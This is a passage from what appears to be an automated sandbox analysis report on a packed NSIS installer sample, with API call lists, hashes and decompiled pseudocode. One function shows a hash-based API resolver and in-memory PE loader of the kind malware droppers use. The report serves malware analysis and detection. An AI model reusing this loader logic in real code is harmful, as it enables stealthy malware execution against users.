                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C2
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032CE
                                            • DeleteFileA.KERNELBASE(1033), ref: 004032E5
                                              • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                              • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                            • OleUninitialize.OLE32(00000020), ref: 00403366
                                            • ExitProcess.KERNEL32 ref: 00403386
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DN_467842234567.exe" ,00000000,00000020), ref: 00403399
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DN_467842234567.exe" ,00000000,00000020), ref: 004033A8
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DN_467842234567.exe" ,00000000,00000020), ref: 004033B3
                                            • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DN_467842234567.exe" ,00000000,00000020), ref: 004033BF
                                            • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                            • DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
                                            • CopyFileA.KERNEL32 ref: 00403439
                                            • CloseHandle.KERNEL32(00000000,00428C58,00428C58,?,00428C58,00000000), ref: 00403466
                                            • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403517
                                            • ExitProcess.KERNEL32 ref: 0040353A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                            • String ID: $ /D=$ ]_$ _?=$"$"C:\Users\user\Desktop\DN_467842234567.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DN_467842234567.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$hyeatlxkvdhyymhha Setup$~nsu
                                            • API String ID: 3469842172-2623281342
                                            • Opcode ID: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
                                            • Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
                                            • Opcode Fuzzy Hash: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
                                            • Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004054EC, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E004054EC(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040579B(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x42eca8 =  *0x42eca8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405BC7(0x42b0a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405701(_t72);
					} else {
						lstrcatA(0x42b0a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x42b0a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056E5( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405BC7(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040587F(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404EB3(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x42eca8 =  *0x42eca8 + 1;
										} else {
											E00404EB3(0xfffffff1, _t72);
											E00405915(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054EC(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x42b0a8 - 0x5c;
					if( *0x42b0a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405EC2(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004056BA(_t72);
							E0040587F(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404EB3(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404EB3(0xfffffff1, _t72);
							return E00405915(__eflags, _t72, 0);
						}
						L33:
						 *0x42eca8 =  *0x42eca8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                            0x004054f7
                                            0x004054fb
                                            0x00405504
                                            0x00405507
                                            0x0040550a
                                            0x00405512
                                            0x00405514
                                            0x00405515
                                            0x00000000
                                            0x00405515
                                            0x00405524
                                            0x00405524
                                            0x00405527
                                            0x0040552a
                                            0x0040553e
                                            0x00405545
                                            0x0040554a
                                            0x0040554c
                                            0x0040555c
                                            0x0040554e
                                            0x00405554
                                            0x00405554
                                            0x00405561
                                            0x00405564
                                            0x0040556f
                                            0x00405575
                                            0x0040557a
                                            0x0040558a
                                            0x0040558c
                                            0x00405592
                                            0x00405595
                                            0x00405598
                                            0x00405655
                                            0x00405655
                                            0x00405659
                                            0x0040565b
                                            0x0040565b
                                            0x0040565b
                                            0x0040565b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040559e
                                            0x0040559e
                                            0x004055a7
                                            0x004055ad
                                            0x004055b2
                                            0x004055b5
                                            0x004055b7
                                            0x004055bb
                                            0x004055bd
                                            0x004055bd
                                            0x004055bb
                                            0x004055c0
                                            0x004055c3
                                            0x004055d6
                                            0x004055d8
                                            0x004055dd
                                            0x004055e4
                                            0x004055fc
                                            0x00405602
                                            0x00405608
                                            0x0040560a
                                            0x0040562f
                                            0x0040560c
                                            0x0040560c
                                            0x00405610
                                            0x00405624
                                            0x00405612
                                            0x00405615
                                            0x0040561d
                                            0x0040561d
                                            0x00405610
                                            0x004055e6
                                            0x004055ec
                                            0x004055ee
                                            0x004055f4
                                            0x004055f4
                                            0x004055ee
                                            0x00000000
                                            0x004055e4
                                            0x004055c5
                                            0x004055c8
                                            0x004055ca
                                            0x00000000
                                            0x00000000
                                            0x004055cc
                                            0x004055ce
                                            0x00000000
                                            0x00000000
                                            0x004055d0
                                            0x004055d4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405634
                                            0x0040563e
                                            0x00405644
                                            0x00405644
                                            0x0040564f
                                            0x00000000
                                            0x0040564f
                                            0x00405566
                                            0x0040556d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040552c
                                            0x0040552c
                                            0x0040552e
                                            0x0040565f
                                            0x00405662
                                            0x00405665
                                            0x004056b7
                                            0x004056b7
                                            0x004056b7
                                            0x00405667
                                            0x0040566a
                                            0x00405675
                                            0x0040567a
                                            0x0040567c
                                            0x00000000
                                            0x00000000
                                            0x0040567f
                                            0x00405685
                                            0x0040568b
                                            0x00405691
                                            0x00405693
                                            0x00000000
                                            0x004056af
                                            0x00405695
                                            0x00405699
                                            0x00000000
                                            0x00000000
                                            0x0040569e
                                            0x00000000
                                            0x004056a5
                                            0x0040566c
                                            0x0040566c
                                            0x00000000
                                            0x0040566c
                                            0x00405534
                                            0x00405538
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405538

                                            APIs
                                            • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040550A
                                            • lstrcatA.KERNEL32(0042B0A8,\*.*,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405554
                                            • lstrcatA.KERNEL32(?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405575
                                            • lstrlenA.KERNEL32(?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040557B
                                            • FindFirstFileA.KERNEL32(0042B0A8,?,?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040558C
                                            • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040563E
                                            • FindClose.KERNEL32(?), ref: 0040564F
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004054F6
                                            • "C:\Users\user\Desktop\DN_467842234567.exe" , xrefs: 004054EC
                                            • \*.*, xrefs: 0040554E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\DN_467842234567.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                            • API String ID: 2035342205-3005994770
                                            • Opcode ID: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                                            • Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
                                            • Opcode Fuzzy Hash: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                                            • Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 729156EA, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E729156EA(void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				long _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				char _v60;
				short _t60;
				short _t61;
				short _t62;
				void* _t78;
				void* _t79;
				void _t81;
				long _t86;
				void* _t91;
				void* _t95;
				void* _t100;
				void* _t102;
				short _t103;
				short _t120;
				signed int _t133;
				void* _t135;
				void* _t136;
				void* _t138;
				void* _t139;
				void* _t141;
				void* _t142;

				_t142 = __eflags;
				_t60 = 0x6e;
				_v60 = _t60;
				_t100 = 0;
				_t61 = 0x74;
				_t103 = 0x64;
				_t120 = 0x6c;
				_v58 = _t61;
				_t62 = 0x2e;
				_v50 = _t62;
				_v56 = _t103;
				_v54 = _t120;
				_v52 = _t120;
				_v48 = _t103;
				_v46 = _t120;
				_v44 = _t120;
				_v42 = 0;
				_t137 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				E72915A5E( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fe63623);
				_v16 = E72915A5E( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fbd727f);
				_v12 = E72915A5E(_t137, 0x7fb47add);
				_v32 = E72915A5E(_t137, 0x7fe7f840);
				_v24 = E72915A5E(_t137, 0x7fe1f1fb);
				_v28 = E72915A5E(_t137, 0x7f951704);
				_v36 = E72915A5E(_t137, 0x7f91a078);
				_t78 = CreateFileW(E72915A2C( &_v60, _t142), 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_t138 = _t78;
				_v20 = _t138;
				if(_t138 == 0xffffffff) {
					L13:
					_t139 = _t100;
					L14:
					_t79 = _v20;
					__eflags = _t79;
					if(_t79 != 0) {
						_v24(_t79);
					}
					_v36(0);
					L22:
					while( *_t100 != 0xb8) {
						_t81 =  *_t100;
						__eflags = _t81 - 0xe9;
						if(_t81 != 0xe9) {
							__eflags = _t81 - 0xea;
							if(_t81 != 0xea) {
								_t100 = _t100 + 1;
								__eflags = _t100;
							} else {
								_t100 =  *(_t100 + 1);
							}
						} else {
							_t100 = _t100 + 5 +  *(_t100 + 1);
						}
					}
					_t135 =  *(_t100 + 1);
					if(_t139 != 0) {
						VirtualFree(_t139, 0, 0x8000);
					}
					return _t135;
				}
				_t86 = _v16(_t138, 0);
				_v16 = _t86;
				if(_t86 == 0xffffffff) {
					goto L13;
				}
				_t136 = VirtualAlloc(0, _t86, 0x3000, 4);
				if(_t136 == 0 || ReadFile(_t138, _t136, _v16,  &_v40, 0) == 0) {
					goto L13;
				} else {
					_t141 =  *((intOrPtr*)(_t136 + 0x3c)) + _t136;
					_v32 =  *(_t141 + 0x14) & 0x0000ffff;
					_t91 = VirtualAlloc(0,  *(_t141 + 0x50), 0x3000, 4);
					_v8 = _t91;
					if(_t91 == 0) {
						_t139 = _t91;
						goto L14;
					}
					E729159C3(_t91, _t136,  *((intOrPtr*)(_t141 + 0x54)));
					_v12 = _v12 & 0;
					if(0 >=  *(_t141 + 6)) {
						L8:
						_t139 = _v8;
						_t100 = E72915A5E(_t139, _a4);
						if(_t100 == 0) {
							goto L14;
						}
						_t95 = _v20;
						if(_t95 != 0) {
							FindCloseChangeNotification(_t95);
						}
						VirtualFree(_t136, 0, 0x8000);
						goto L22;
					} else {
						_t102 = _v8;
						_t116 = _v32 + 0x2c + _t141;
						_v16 = _v32 + 0x2c + _t141;
						do {
							E729159C3( *((intOrPtr*)(_t116 - 8)) + _t102,  *_t116 + _t136,  *((intOrPtr*)(_t116 - 4)));
							_t133 = _v12 + 1;
							_t116 = _v16 + 0x28;
							_v12 = _t133;
							_v16 = _v16 + 0x28;
						} while (_t133 < ( *(_t141 + 6) & 0x0000ffff));
						goto L8;
					}
				}
			}










































                                            0x729156ea
                                            0x729156f5
                                            0x729156f8
                                            0x729156fc
                                            0x729156fe
                                            0x72915701
                                            0x72915704
                                            0x72915705
                                            0x7291570b
                                            0x7291570c
                                            0x72915712
                                            0x72915716
                                            0x7291571a
                                            0x7291571e
                                            0x72915722
                                            0x72915726
                                            0x7291572a
                                            0x72915741
                                            0x7291574a
                                            0x72915762
                                            0x72915771
                                            0x72915780
                                            0x7291578f
                                            0x7291579e
                                            0x729157bb
                                            0x729157c4
                                            0x729157c6
                                            0x729157c8
                                            0x729157ce
                                            0x729158ae
                                            0x729158ae
                                            0x729158b0
                                            0x729158b0
                                            0x729158b3
                                            0x729158b5
                                            0x729158b8
                                            0x729158b8
                                            0x729158bd
                                            0x00000000
                                            0x729158dc
                                            0x729158c2
                                            0x729158c4
                                            0x729158c6
                                            0x729158d2
                                            0x729158d4
                                            0x729158db
                                            0x729158db
                                            0x729158d6
                                            0x729158d6
                                            0x729158d6
                                            0x729158c8
                                            0x729158ce
                                            0x729158ce
                                            0x729158c6
                                            0x729158e1
                                            0x729158e6
                                            0x729158f0
                                            0x729158f0
                                            0x729158fb
                                            0x729158fb
                                            0x729157d6
                                            0x729157d9
                                            0x729157df
                                            0x00000000
                                            0x00000000
                                            0x729157f1
                                            0x729157f5
                                            0x00000000
                                            0x72915810
                                            0x72915815
                                            0x72915824
                                            0x72915827
                                            0x7291582a
                                            0x7291582f
                                            0x729158aa
                                            0x00000000
                                            0x729158aa
                                            0x72915838
                                            0x7291583d
                                            0x72915846
                                            0x7291587f
                                            0x7291587f
                                            0x7291588c
                                            0x72915890
                                            0x00000000
                                            0x00000000
                                            0x72915892
                                            0x72915897
                                            0x7291589a
                                            0x7291589a
                                            0x729158a5
                                            0x00000000
                                            0x72915848
                                            0x7291584b
                                            0x72915851
                                            0x72915853
                                            0x72915856
                                            0x72915862
                                            0x7291586d
                                            0x72915872
                                            0x72915875
                                            0x72915878
                                            0x7291587b
                                            0x00000000
                                            0x72915856
                                            0x72915846

                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 729157C4
                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,72915472,7FC6FA16,72915631), ref: 729157EE
                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,72915472,7FC6FA16), ref: 72915805
                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,72915472,7FC6FA16,72915631), ref: 72915827
                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,72915472,7FC6FA16,72915631,00000000,00000000), ref: 7291589A
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,72915472,7FC6FA16,72915631), ref: 729158A5
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,72915472,7FC6FA16,72915631,00000000), ref: 729158F0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.676332981.0000000072915000.00000040.00020000.sdmp, Offset: 72910000, based on PE: true
                                            • Associated: 00000000.00000002.676315009.0000000072910000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676320429.0000000072911000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676327878.0000000072914000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676337588.0000000072917000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                            • String ID:
                                            • API String ID: 656311269-0
                                            • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                            • Instruction ID: e683628e03871babdfd2d0cba909895a628da770d0b8cf4154fce834e468e320
                                            • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                            • Instruction Fuzzy Hash: DC619371E0020ABFDB10DBADC880BAEB7B9AF48714F158099E516E7390EB749D01CB56
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405EC2, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405EC2(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0f0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0f0;
			}




                                            0x00405ecd
                                            0x00405ed6
                                            0x00000000
                                            0x00405ee3
                                            0x00405ed9
                                            0x00000000

                                            APIs
                                            • FindFirstFileA.KERNELBASE(?,0042C0F0,0042B4A8,004057DE,0042B4A8,0042B4A8,00000000,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405ECD
                                            • FindClose.KERNEL32(00000000), ref: 00405ED9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID:
                                            • API String ID: 2295610775-0
                                            • Opcode ID: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                            • Instruction ID: 29e96ad6865097314c3b976147751eb8d0045a3fb470af3f15328f49aab52e00
                                            • Opcode Fuzzy Hash: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                            • Instruction Fuzzy Hash: 11D0C9319185209BC2105768AD0885B6A59DB593357108A72B465F62E0CA7499528AEA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004039B0, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 84%
                                            			E004039B0(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42a084 = _t35;
					if(_t115 == 0x110) {
						 *0x42ec28 = _t125;
						 *0x42a098 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429060 = _t91;
						E00403E83(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e408); // executed
						 *0x42e3ec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a084 = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42ec40;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403ECF(0x40b);
						while(1) {
							_t37 =  *0x42a084;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x42ec44; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42e3ec - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x42ec44; // 0x2
							__eflags =  *0x4091ac - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BE9(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E83(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ecac - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403EA5(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x429060, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ecac - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x42a098);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x429060);
							}
							E00403EB8();
							E00405BC7(0x42a0a0, "hyeatlxkvdhyymhha Setup");
							E00405BE9(0x42a0a0, _t125, _t130,  &(0x42a0a0[lstrlenA(0x42a0a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x42a0a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e3f8);
									 *0x429870 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42ec20,  *_t130 +  *0x42e400 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x42e3f8 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E83(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e3f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e3ec - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42e3f8, 8);
									E00403ECF(0x405);
									goto L58;
								}
								__eflags =  *0x42ecac - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x42eca0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
